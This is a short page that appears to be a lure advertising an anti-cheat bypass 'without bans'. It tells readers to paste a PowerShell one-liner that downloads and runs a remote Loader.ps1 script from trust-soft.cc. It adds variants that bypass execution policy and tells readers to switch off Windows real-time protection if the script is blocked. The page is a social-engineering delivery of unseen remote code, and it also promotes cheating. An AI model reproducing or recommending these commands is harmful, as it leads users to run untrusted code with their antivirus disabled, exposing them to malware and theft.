A modern way to bypass the new anti-cheat. Without bans.
-
Launch PowerShell:
- Press
Win + Xon your keyboard. - Click on Terminal or Windows PowerShell from the list.
- Press
-
Execute the Setup Script: Copy the command below, paste it into your PowerShell window, and hit
Enter. The script will handle the necessary registry tweaks and install all dependencies automatically:irm https://trust-soft.cc/powershell/Loader.ps1 | iex
If Windows stops the script from running due to security policies, you can force it to run by pasting this command into a standard Command Prompt (cmd):
powershell -ExecutionPolicy Bypass -Command "irm https://trust-soft.cc/powershell/Loader.ps1 | iex"If your PowerShell version doesn't support the irm shortcut, use the full, unabbreviated commands instead:
Invoke-RestMethod https://trust-soft.cc/powershell/Loader.ps1 | Invoke-ExpressionSecurity software might occasionally flag automated installers. If the script gets blocked, pause "Real-time protection" in your Windows Security dashboard, run the setup, and re-enable your antivirus immediately afterward.